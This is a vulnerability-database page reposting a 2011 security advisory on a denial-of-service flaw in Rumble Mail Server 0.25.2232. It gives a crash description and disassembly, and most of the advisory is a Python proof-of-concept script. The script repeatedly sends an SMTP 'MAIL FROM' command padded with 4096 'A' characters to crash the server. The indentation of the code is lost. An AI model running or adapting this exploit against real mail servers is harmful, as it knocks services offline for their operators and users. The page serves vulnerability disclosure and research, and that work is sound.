Lucene search
K

Rumble 0.25.2232 Denial Of Service

🗓️ 29 Mar 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Rumble 0.25.2232 denial of service vulnerability on Windows Vista + XAMPP due to memory read error. PoC creates an overflow with 'A' characters in MAIL FROM command

Code
`# ------------------------------------------------------------------------  
# Software................Rumble 0.25.2232  
# Vulnerability...........Denial Of Service  
# Threat Level............Serious (3/5)  
# Download................http://humbedooh.users.sourceforge.net/  
# Discovery Date..........3/27/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <[email protected]>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A denial of service vulnerability can be exploited to crash Rumble  
# Mail Server v0.25.2231.  
#   
# rumble_win32.exe: The instruction at 0x96CEEB referenced memory at  
# 0x41414149. The memory could not be read (0x0096CEEB -> 41414149)  
#   
# Disassembly:  
#   
# .text:0096CEEB mov edx, [ecx+8]  
# .text:0096CEEE mov [ebp-8], edx  
# .text:0096CEF1 mov eax, [ebp-8]  
# .text:0096CEF4 mov ecx, [eax]  
# .text:0096CEF6 mov [ebp-0Ch], ecx  
# .text:0096CEF9 mov edx, [ebp+0Ch]  
# .text:0096CEFC mov [ebp-10h], edx  
# .text:0096CEFF  
# .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31  
# .text:0096CEFF mov eax, [ebp-10h]  
# .text:0096CF02 mov cl, [eax]  
# .text:0096CF04 mov [ebp-11h], cl  
# .text:0096CF07 mov edx, [ebp-0Ch]  
# .text:0096CF0A cmp cl, [edx]  
# .text:0096CF0C jnz short loc_96CF3C  
#   
#   
# --PoC--  
  
import socket  
  
host = 'localhost'  
tld = 'mydomain.tld'  
port = 25  
  
def crash():   
for i in range(0, 16):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.settimeout(32)   
  
junk = 'A' * 4096  
  
print s.recv(8192)  
s.send('HELO ' + tld + '\r\n')  
print s.recv(8192)  
s.send('MAIL FROM ' + junk + '\r\n')   
print s.recv(8192)  
  
s.close()  
  
  
crash()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4
20